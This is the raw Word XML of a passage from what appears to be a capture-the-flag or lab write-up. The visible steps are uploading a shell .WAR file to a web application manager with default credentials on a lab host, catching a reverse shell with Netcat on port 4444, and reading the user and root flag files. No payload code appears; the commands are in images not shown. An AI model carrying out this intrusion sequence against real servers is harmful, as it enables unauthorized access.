      </w:pPr>
    </w:p>
    <w:p w14:paraId="7849536B" w14:textId="030C0954" w:rsidR="00800A53" w:rsidRDefault="00800A53" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shows where the .WAR file is to be uploaded. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30123279" w14:textId="28D4F96C" w:rsidR="00800A53" w:rsidRDefault="00B33040" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="209552E1" wp14:editId="02127F75">
            <wp:extent cx="3650349" cy="749659"/>
            <wp:effectExtent l="19050" t="19050" r="26670" b="12700"/>
            <wp:docPr id="760259312" name="Picture 7602593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312" name="Picture 760259312" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId143" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="1" t="5131" r="252" b="16324"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3670635" cy="753825"/>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45271683" w14:textId="04F38D98" w:rsidR="00800A53" w:rsidRDefault="00800A53" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="488" w:name="_Toc111363692"/>
      <w:bookmarkStart w:id="489" w:name="_Toc111363829"/>
      <w:bookmarkStart w:id="490" w:name="_Toc111981852"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>127</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Browse to upload the .WAR file</w:t>
      </w:r>
      <w:r w:rsidR="0068269D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-16929259"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[57]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="488"/>
      <w:bookmarkEnd w:id="489"/>
      <w:bookmarkEnd w:id="490"/>
    </w:p>
    <w:p w14:paraId="3AC1DE8C" w14:textId="77777777" w:rsidR="00A3392C" w:rsidRPr="00A3392C" w:rsidRDefault="00A3392C" w:rsidP="00A3392C"/>
    <w:p w14:paraId="79ADBCB5" w14:textId="33C62723" w:rsidR="00A84DA8" w:rsidRPr="00A84DA8" w:rsidRDefault="00A84DA8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The shell</w:t>
      </w:r>
      <w:r w:rsidR="00C11121">
        <w:t>.war file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is then called by going to 10.10.10.95:8080/myshell or clicking ‘start’ in the right-hand column</w:t>
      </w:r>
      <w:r w:rsidR="00C11121">
        <w:t xml:space="preserve"> of the application manager</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558B4AEF" w14:textId="05ECACDD" w:rsidR="00FA0E34" w:rsidRDefault="00A84DA8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="616C8378" wp14:editId="546408ED">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3389104</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2350770</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="320040" cy="186055"/>
                <wp:effectExtent l="0" t="0" r="22860" b="23495"/>
                <wp:wrapNone/>
                <wp:docPr id="760259305" name="Rectangle 760259305"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="320040" cy="186055"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="1905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A32FC0" id="Rectangle 760259305" o:spid="_x0000_s1026" style="position:absolute;margin-left:266.85pt;margin-top:185.1pt;width:25.2pt;height:14.6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" filled="f" strokecolor="#c00000" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251697152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="170584DC" wp14:editId="75C13C13">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>75715</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2451226</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="238792" cy="174726"/>
                <wp:effectExtent l="0" t="0" r="27940" b="15875"/>
                <wp:wrapNone/>
                <wp:docPr id="760259306" name="Rectangle 760259306"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="238792" cy="174726"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="1905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2853C6" id="Rectangle 760259306" o:spid="_x0000_s1026" style="position:absolute;margin-left:5.95pt;margin-top:193pt;width:18.8pt;height:13.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" filled="f" strokecolor="#c00000" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FA0E34" w:rsidRPr="00FA0E34">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C30E2CB" wp14:editId="72E2E80A">
            <wp:extent cx="5560060" cy="2718325"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="25400"/>
            <wp:docPr id="760259297" name="Picture 76025929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97" name="Picture 760259297" descr="Table&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId144"/>
                    <a:srcRect l="102" t="2818" r="2847" b="3200"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5562533" cy="2719534"/>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3B05D0B" w14:textId="67F69B49" w:rsidR="00A84DA8" w:rsidRDefault="00A84DA8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="491" w:name="_Toc111363693"/>
      <w:bookmarkStart w:id="492" w:name="_Toc111363830"/>
      <w:bookmarkStart w:id="493" w:name="_Toc111981853"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>128</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Start the Reverse Shell</w:t>
      </w:r>
      <w:r w:rsidR="0068269D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="500161503"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[57]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="491"/>
      <w:bookmarkEnd w:id="492"/>
      <w:bookmarkEnd w:id="493"/>
    </w:p>
    <w:p w14:paraId="3F3F0BA2" w14:textId="187E67A1" w:rsidR="00A84DA8" w:rsidRDefault="00A84DA8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445A4A6E" w14:textId="150DE3DE" w:rsidR="00800A53" w:rsidRDefault="00800A53" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Netcat is </w:t>
      </w:r>
      <w:r w:rsidR="00E6222A">
        <w:t>de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ployed to listen to the reverse </w:t>
      </w:r>
      <w:r w:rsidR="00C11121">
        <w:t>shell connect back</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on port 4444 that was used in the .WAR file as demonstrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:t>29.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15622172" w14:textId="6C2901BA" w:rsidR="00800A53" w:rsidRDefault="00800A53" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00800A53">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="487F5B4E" wp14:editId="2E4B6681">
            <wp:extent cx="2255520" cy="198858"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="760259309" name="Picture 760259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5"/>
                    <a:srcRect t="44475"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2255715" cy="198875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C34367A" w14:textId="0E5FE4B3" w:rsidR="00800A53" w:rsidRDefault="00800A53" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="494" w:name="_Toc111363694"/>
      <w:bookmarkStart w:id="495" w:name="_Toc111363831"/>
      <w:bookmarkStart w:id="496" w:name="_Toc111981854"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>129</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Netcat is run on port 4444 defined in .WAR file</w:t>
      </w:r>
      <w:bookmarkEnd w:id="494"/>
      <w:bookmarkEnd w:id="495"/>
      <w:bookmarkEnd w:id="496"/>
    </w:p>
    <w:p w14:paraId="6A06DA78" w14:textId="77777777" w:rsidR="00C11121" w:rsidRDefault="00C11121" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BEE24FD" w14:textId="30C4D8E5" w:rsidR="000D0351" w:rsidRDefault="000D0351" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> illustrates that the listener is successful</w:t>
      </w:r>
      <w:r w:rsidR="008F688B">
        <w:t>, and a reverse shell connection has been established. This means that there is a connection to this machine through a vulnerable web service that has default credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9B21A9" w14:textId="0A0934C0" w:rsidR="000D0351" w:rsidRDefault="008F688B" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1969C58C" wp14:editId="0A59C08C">
            <wp:extent cx="3993863" cy="1191670"/>
            <wp:effectExtent l="0" t="0" r="6985" b="8890"/>
            <wp:docPr id="760259319" name="Picture 7602593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319" name="Picture 760259319" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId146">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="758" r="25886" b="2854"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3994318" cy="1191806"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B33DF2A" w14:textId="549A9ABF" w:rsidR="000D0351" w:rsidRDefault="000D0351" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="497" w:name="_Toc111363695"/>
      <w:bookmarkStart w:id="498" w:name="_Toc111363832"/>
      <w:bookmarkStart w:id="499" w:name="_Toc111981855"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>130</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: NC is successful</w:t>
      </w:r>
      <w:r w:rsidR="0068269D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1566839332"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[57]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="497"/>
      <w:bookmarkEnd w:id="498"/>
      <w:bookmarkEnd w:id="499"/>
    </w:p>
    <w:p w14:paraId="1DECCE9A" w14:textId="446E38D2" w:rsidR="00C11121" w:rsidRDefault="00C11121" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5386B0DF" w14:textId="43E9C5FD" w:rsidR="00EC0D7E" w:rsidRDefault="00EC0D7E" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>There is a ‘C:</w:t>
      </w:r>
      <w:r w:rsidR="00AA2218">
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t>’ so it is a Windows application. Therefore, if the directory is changed as follows</w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:t>, the flags’ text is visible.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0975F4FB" w14:textId="3165C6F2" w:rsidR="00B77DD1" w:rsidRDefault="00B77DD1" w:rsidP="00B77DD1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B77DD1">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="288DFB45" wp14:editId="69ED593C">
            <wp:extent cx="2423370" cy="1127858"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="Picture 3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ext, letter&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId147"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2423370" cy="1127858"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6A3A08" w14:textId="3FDAAFA0" w:rsidR="00EC0D7E" w:rsidRPr="00EC0D7E" w:rsidRDefault="00EC0D7E" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">The output is illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>showing the</w:t>
      </w:r>
      <w:r w:rsidR="00AA2218">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> text in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> user.txt and root.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6713A3" w14:textId="41E56621" w:rsidR="008F688B" w:rsidRDefault="00AA2218" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251706368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="433A5415" wp14:editId="1F05591D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>583749</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2178050</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2353310" cy="300355"/>
                <wp:effectExtent l="0" t="0" r="27940" b="23495"/>
                <wp:wrapNone/>
                <wp:docPr id="760259322" name="Rectangle 760259322"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2353310" cy="300355"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="1905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7A308C" id="Rectangle 760259322" o:spid="_x0000_s1026" style="position:absolute;margin-left:45.95pt;margin-top:171.5pt;width:185.3pt;height:23.6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" filled="f" strokecolor="#c00000" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251715584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="008C81C3" wp14:editId="34B2AFBA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>588850</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
